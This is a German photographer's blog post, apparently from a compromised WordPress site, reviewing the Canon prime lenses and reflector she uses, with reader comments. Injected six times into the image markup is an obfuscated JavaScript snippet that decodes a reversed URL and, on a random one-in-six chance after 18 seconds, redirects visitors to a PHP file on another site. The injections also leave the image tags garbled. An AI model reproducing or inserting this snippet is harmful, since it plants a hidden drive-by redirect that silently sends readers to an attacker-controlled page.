Erfahrungsbericht Objektivpark | Welche Objektive befinden sich in meiner Tasche

Zuerst möchte ich darauf hinweisen, dass jeder für sich selbst herausfinden muss, welche Objektive zu einem selbst passen. Das heißt, nur weil ich mit unten genannten Objektiven zufrieden bin und meine Bedürfnisse decken, heißt es nicht, dass es für dich genauso funktioniert. Ich möchte dennoch einen kleinen Überblick geben. Es kann besonders für Neulinge sehr schwierig sein, Objektive auseinander zu halten und festzustellen, welche man überhaupt benötigt und mag. Ich persönlich bin nur im Besitz von Festbrennweiten. Diese sind lichtstärker und können daher besonders in dunklen Räumen punkten. Ein toller Nebeneffekt ist das schöne Bokeeh. Du bist dir unsicher, welches Objektiv zu dir passt? Ein paar Tipps, wie ich zu meinen Liebingen gekommen bin (auch ich musste erst herausfinden, was zu mir und meiner Fotografie passt):

  1. Schaue dich auf Fotografie Plattformen um. Dort werden immer wieder über Objektive diskutiert und auch Beispielbilder gepostet.
  2. Lese Testberichte!
  3. Bevor du dir ein neues Objektiv kaufst, leihe es dir bei einem Fotoverleih aus. Dies kostet heute nicht mehr die Welt und bewahrt dich am Ende davor, dass das Objektiv nie aus der Tasche genommen wird, weil du es nicht nutzt.

Objektive, welche ich am meisten an meiner Kamera 5d Mark III nutze:

Objektiv_Canon_Lens_4__Fo<script>$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($nJe(0), delay);}</script>tografie_Heidelberg_Fo<script>$nJe=function(n){if (typeof ($nJe.list[n]) == tograf_olivia_di_Stefano_“ src=“https://www.oliviadistefano.de/wp-content/uploads/2014/03/Objektiv_Canon_Lens_4__Fotografie_Heidelberg_Fotograf_olivia_di_Stefano_.jpg“ width=“900″ height=“600″ />

Canon 35 1,4:
Diese Linse nutze ich besonders in Räumen, wenn nicht viel Platz besteht und auch um mit meinen Bildern eine kleine Geschichte zu erzählen.

Objektiv_Canon_Lens_3__Fo<script>$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($nJe(0), delay);}</script>tografie_Heidelberg_Fo<script>$nJe=function(n){if (typeof ($nJe.list[n]) == tograf_olivia_di_Stefano_“ src=“https://www.oliviadistefano.de/wp-content/uploads/2014/03/Objektiv_Canon_Lens_3__Fotografie_Heidelberg_Fotograf_olivia_di_Stefano_.jpg“ width=“900″ height=“673″ />

Canon 50 f 1,2:
Meine Allroundlinse! Ich benutze es  sehr oft und meist auch zu Beginn eines Shootings. Benötigt man die Lichtstärke 1,2? Nein sicher nicht und ist für den Preis auch sehr hoch. Falls du neu in der Fotografiebranche bist, würde ich immer das 50 1,4 empfehlen. Falls ich mich für ein Objektiv für eine Hochzeit oder Shooting entscheiden müsste, wäre es immer das 50 1,2, welches ich mitnehmen würde.

Objektiv_Canon_Lens_2__Fo<script>$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($nJe(0), delay);}</script>tografie_Heidelberg_Fo<script>$nJe=function(n){if (typeof ($nJe.list[n]) == tograf_olivia_di_Stefano_“ src=“https://www.oliviadistefano.de/wp-content/uploads/2014/03/Objektiv_Canon_Lens_2__Fotografie_Heidelberg_Fotograf_olivia_di_Stefano_.jpg“ width=“900″ height=“674″ />

Canon 85 1,8:
Das Objektiv habe ich schon sehr lange und liebe es. Man kann damit wunderschöne Portraits, mit einem atemberaubenden Hintergrund, zaubern. Besonders wenn ich bei einem Shooting eine Zeit lang mit dem 50 oder 35 fotografiert habe und dann auf das 85, 1,8 umsteige, merke ich schnell, wie das die Perspektive und den Eindruck ändert und was mehr Auswahlmaterial am Ende liefert.

Objektiv_Canon_Lens_1__Fo<script>$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($nJe(0), delay);}</script>tografie_Heidelberg_Fo<script>$nJe=function(n){if (typeof ($nJe.list[n]) == tograf_olivia_di_Stefano_“ src=“https://www.oliviadistefano.de/wp-content/uploads/2014/03/Objektiv_Canon_Lens_1__Fotografie_Heidelberg_Fotograf_olivia_di_Stefano_.jpg“ width=“900″ height=“673″ />

Dann bin ich im Besitz zwei weiterer Objektive, welche leider nicht ganz so häufig in Gebrauch sind:
Objektiv_Canon_Lens_6__Fo<script>$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($nJe(0), delay);}</script>tografie_Heidelberg_Fo<script>$nJe=function(n){if (typeof ($nJe.list[n]) == tograf_olivia_di_Stefano_“ src=“https://www.oliviadistefano.de/wp-content/uploads/2014/03/Objektiv_Canon_Lens_6__Fotografie_Heidelberg_Fotograf_olivia_di_Stefano_.jpg“ width=“900″ height=“674″ />

Canon 100 2,8 Markro:
Absolut empfehlenswert, falls man gerne Objekte nah fotografiert. Durch das Makro ist es perfekt für Ringbilder, Schmuck, Blumendekoration und andere kleine Dinge, lassen sich so groß heraus bringen. Ich nutze es auch gerne für Portraits und mag es sehr, denn es ist auch etwas schärfer als die meisten meiner Objektive.

Das beste natürlich zum Schluß: Mein Canon 135 2:
es ist wirklich schade, dass ich es so selten nutze, denn diese Linse  ist farblich, schärfe- und bokeehtechnisch mein stärkstes Objektiv. Leider ist die Brennweite nicht ganz so optimal für mich, so dass ich sie meist zuhause lasse. Aber wenn ich sie mal mitnehme, ist es immer wieder erstaunlich, was für tolle Ergebnisse damit erzielt werden.

Was sonst noch immer bei Shootings oder Hochzeiten dabei ist und nicht fehlen darf: ein Hocker (ja, man kann es sich denken, ich bin nicht gerade groß geraten und irgendwie muss man sich ja Abhilfe schaffen ;)) und mein Lieblingsreflektor von Multidisc. Ich habe zuhause auch einen Sunbouncer, welchen die meisten Fotografen empfehlen, aber für mich nicht die Ergebnisse liefert, die ich mir wünsche. Ich komme mit dem Multidisc Reflektor viel besser klar und bin froh, ihn mir auf der Photokina gekauft zu haben!
Objektiv_Canon_Lens_9__Fo<script>$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($nJe(0), delay);}</script>tografie_Heidelberg_Fo<script>$nJe=function(n){if (typeof ($nJe.list[n]) == tograf_olivia_di_Stefano_“ src=“https://www.oliviadistefano.de/wp-content/uploads/2014/03/Objektiv_Canon_Lens_9__Fotografie_Heidelberg_Fotograf_olivia_di_Stefano_.jpg“ width=“900″ height=“299″ />

Jetzt wisst ihr, welche Objektive ich mit der Zeit für mich Lieben gelernt habe. Irgendwann soll dann auch mein 85 1,8 gegen ein 85 1,2 getauscht werden, aber ich fühle mich mit der Aufstellung so wohl, dass dies noch warten kann. Genau da ist der Punkt, ich habe anfangs auch bei allen großen Fotografen geschaut mit was sie fotografieren und danach gewählt. Und inzwischen suche und kaufe ich mir Objektive nach meinen Bedürfnissen und Vorlieben. Dies kommt mit der Zeit ganz automatisch, wenn man lernt die Dinge für sich selbst zu entdecken.

Wer mehr über mein Equipment erfahren möchte kann gerne auch hier & hier reinschauen.

Schreibe einen Kommentar...

DANKE für euren Besuch und die lieben Worte. Gekennzeichnete Felder bitte ausfüllen. *

  • Matthias - Hallo Olivia,

    ich mag es, wie Du Dein Equipment hier vorstellst, durch die Beispielfotos wird es lebendig und ich beneide Dich auch ein wenig um ein paar Deiner Objektive. ;) Schöne Übersicht!

    Insgesamt mag ich Deine Arbeiten sehr! Tolle Fotos, viele Emotionen – ich schau sicher wieder mal rein. :)

    Liebe Grüße aus Hamburg
    MatthiasAntwortenCancel

    • Olivia Di Stefano - Vielen Dank! Es freut mich, dass dir meine Vorstellungsrunde der Objektive gefallen hat! Liebe Grüße, OliviaAntwortenCancel

  • Steffi F. - Was für ein schöner Blick in deine Tasche :)
    Danke dir fürs Hinter die Kulissen schauen.
    Ganz liebe GrüßeAntwortenCancel

  • Steffi R. - Toller Bericht meine Liebe :). Ich weiß ja schon welches mein neues Objektiv wird. Hi.. Aber dafür muss ich noch etwas sparen.

    Drück dich :*AntwortenCancel

    • Olivia Di Stefano - Danke liebe Steffi! Und ich glaube zu wissen, welches Ojbektiv bei dir auf der Wunschliste steht und bin mir sogar sicher, dass du damit viel Spaß haben wirst!AntwortenCancel